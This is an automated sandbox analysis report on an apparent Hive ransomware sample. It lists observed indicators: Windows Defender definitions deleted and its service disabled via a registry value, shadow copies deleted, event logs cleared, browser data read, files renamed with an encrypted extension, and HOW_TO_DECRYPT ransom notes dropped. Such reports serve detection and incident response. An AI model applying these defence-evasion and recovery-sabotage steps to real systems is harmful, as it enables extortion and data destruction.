Analysis Overview
SHA256
ece6bccb64b3ea172b531008bdda7f24b0b28a193a67056a43689f852dfd9ddf
Threat Level: Known bad
The file 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.7z was found to be: Known bad.
Malicious Activity Summary
Modifies Windows Defender Real-time Protection settings
Modifies security service
Deletes Windows Defender Definitions
Hive
Deletes shadow copies
Clears Windows event logs
Modifies extensions of user files
Reads user/profile data of web browsers
Launches sc.exe
Drops file in Program Files directory
Suspicious behavior: EnumeratesProcesses
Interacts with shadow copies
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Runs net.exe
Suspicious use of WriteProcessMemory
Runs ping.exe
Opens file in notepad (likely ransom note)
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-12 16:59
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-12 16:59
Reported
2022-01-12 16:59
Platform
win7-en-20211208
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-12 16:59
Reported
2022-01-12 17:04
Platform
win10-en-20211208
Max time kernel
163s
Max time network
125s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SysWOW64\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies extensions of user files
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File renamed | C:\Users\Admin\Pictures\SuspendGroup.raw => C:\Users\Admin\Pictures\SuspendGroup.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_jwgkfQeogic0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\DisableRepair.crw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_VbyinVoK6_A0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\InitializeRename.crw => C:\Users\Admin\Pictures\InitializeRename.crw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_Au01VTEL14o0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ReceiveConvertFrom.tiff.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_k6f4zI7Qmuc0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\SyncAssert.tif.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_fjjmv4gMASc0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\OptimizeRename.raw => C:\Users\Admin\Pictures\OptimizeRename.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_9V2afMISh_s0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\OptimizeRename.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_9V2afMISh_s0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ReceiveConvertFrom.tiff => C:\Users\Admin\Pictures\ReceiveConvertFrom.tiff.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_k6f4zI7Qmuc0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SelectDebug.raw => C:\Users\Admin\Pictures\SelectDebug.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_FJ_HFkhsilo0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\SelectDebug.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_FJ_HFkhsilo0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\SuspendGroup.raw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_jwgkfQeogic0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\DisableRepair.crw => C:\Users\Admin\Pictures\DisableRepair.crw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_VbyinVoK6_A0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\InitializeRename.crw.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_Au01VTEL14o0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SyncAssert.tif => C:\Users\Admin\Pictures\SyncAssert.tif.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_fjjmv4gMASc0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\CompareUninstall.png => C:\Users\Admin\Pictures\CompareUninstall.png.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_al6f_PxsOGY0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\CompareUninstall.png.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_al6f_PxsOGY0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\StandardMSDNR_Retail-pl.xrm-ms.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_CtuFolQ6xGE0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailMediumTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\digsig_icons_2x.png.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_WXrcawFx_2Q0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\iotb_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp3-ul-phn.xrm-ms.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_WEhlYkzA8EM0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\mask\1h.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\western_cardback.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.targetsize-48_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\da-dk\ui-strings.js.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_dkFSCA3qJmc0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ko-kr\ui-strings.js.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_WJ6r73KGnOM0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\es-ES\msaddsr.dll.mui.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_VpNJHtFK5Qk0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\1250_20x20x32.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\3009_32x32x32.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\resources.pri | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\zh-cn\ui-strings.js.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_M8AQ4flckP40.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Internet Explorer\es-ES\ieinstal.exe.mui | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\HowToPlay\FreeCell\Control_10.jpg | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Templates\1033\ContemporaryPhotoAlbum.potx.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_KZWkpXKGsNk0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-150_8wekyb3d8bbwe\AppxManifest.xml | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailBadge.scale-125.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_reportabuse-default_18.svg.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_UX1uN7dth3Q0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\lt_get.svg.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_ykmScO5HkiE0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\MSIPC\sl\iotb_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\HintBarEllipses.16.GrayF.png.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_uTmkZukAU_Q0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup.xml.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_Zha7z8wgPHI0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\8080_36x36x32.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteSectionSmallTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\iotb_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\root\iotb_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\ja-JP\msadcor.dll.mui.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_J_em_jQ1DPM0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_neutral_split.scale-150_8wekyb3d8bbwe\Assets\starttile.dualsim2.surprise.small.scale-150.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ro-ro\ui-strings.js.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_-GApP492Hv00.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\es-ES\TipTsf.dll.mui.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_QW4M2iW4_Ds0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2017.125.40.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraLargeTile.contrast-white_scale-125.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.News\Assets\news_button_down.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-256.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Advanced-Dark.scale-200.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_comment_18.svg.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_lh994_VVNCk0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\boot_zh_CN.jar.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_VxylmRYVR3g0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\GB.XSL.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_kfXk-VELlvg0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\add_reviewer.gif.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_FEsyvLrj3dk0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File created | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\iotb_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Grace-ul-oob.xrm-ms.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_hxE_XqRD4HU0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Aquarium\mask\1h.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\es-ES\iexplore.exe.mui.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_yCiK8woPxW40.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorSmallTile.contrast-black_scale-200.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\contrast-white\SplashScreen.scale-100_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailAppList.scale-150.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner.gif.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_dEDn0gCdCsI0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\sl_get.svg.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_I1aRWYAqGdk0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-140_8wekyb3d8bbwe\Assets\Office\settle.scale-140.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\time.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-200_8wekyb3d8bbwe\Assets\contrast-white\Logo.scale-200_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ja-jp\PlayStore_icon.svg.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_zTnuhdtL9LE0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\ado\msador28.tlb | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sampler.xml.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_jZ0BdjJ05Eg0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\FileIcons\FileLogoExtensions.targetsize-20.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.Background.winmd | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\LTR\WideTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\It.snippets.ps1xml | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-fr\ui-strings.js.7w4l2hCflujiuzCJmcRMhxa4G0SqG3lmeGKFGdziFiz_MGg0nr6cMIs0.j2xnp | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SysWOW64\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SysWOW64\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SysWOW64\reg.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
